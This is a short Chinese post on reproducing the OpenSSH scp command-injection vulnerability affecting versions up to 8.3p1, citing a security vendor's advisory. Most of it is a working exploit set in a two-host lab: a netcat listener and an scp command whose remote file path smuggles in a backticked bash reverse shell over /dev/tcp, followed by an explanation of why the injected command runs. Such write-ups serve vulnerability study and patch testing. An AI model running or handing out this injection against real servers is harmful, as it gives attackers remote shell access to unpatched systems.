最近看好多大佬都在复现这个OpenSSH命令注入漏洞。
2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。
漏洞影响版本:OpenSSH =< 8.3p1
查看版本:ssh -V
环境:
10.100.3.1 server01
10.100.3.2 server02
在 server02 上执行(ps: 一会这个命令行就可以执行 server01 上的任意命令。):
$ nc -lvvp 7777
在 server02 上再启动一个命令行,执行:
$ scp test.txt user@server01:'`bash -i >& /dev/tcp/server02/7777 0>&1`/tmp/test1.txt'
这样执行过之后,第一个命令行就可以执行 user 用户的任意命令了。
这利用了 scp 过程中,服务端需要先计算路径,在计算路径的过程中,注入bash -i >& /dev/tcp/server02/7777 0>&1
命令,这个命令新启动一个服务端的命令行,并且这个新的服务端的命令行的输入和输出都重定向到 TCP 连接中!